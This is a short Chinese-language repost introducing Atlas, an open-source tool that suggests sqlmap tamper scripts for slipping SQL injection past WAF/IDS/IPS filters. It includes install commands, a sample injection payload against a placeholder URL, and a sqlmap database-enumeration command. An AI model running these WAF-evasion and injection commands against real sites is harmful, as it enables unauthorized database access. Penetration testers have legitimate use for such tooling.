Atlas 一款快速SQLMap篡改绕过WAF 工具

Atlas是一个开源工具,可以建议sqlmap篡改绕过WAF / IDS / IPS,该工具基于返回的状态代码。

Atlas 一款快速SQLMap篡改绕过WAF 工具


安装
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py用法
$ python atlas.py –url http://site.com/index.php?id=Price_ASC –payload=”-1234 AND 4321=4321– AAAA” –dbms=mysql –random-agent -v

Atlas 一款快速SQLMap篡改绕过WAF 工具


示例
运行SQLMap:
$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3

Atlas 一款快速SQLMap篡改绕过WAF 工具


文章来源及下载:

https://github.com/m4ll0k/Atlas

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
相关推荐
  • 暂无相关文章
  • 评论 抢沙发

    请登录后发表评论

      暂无评论内容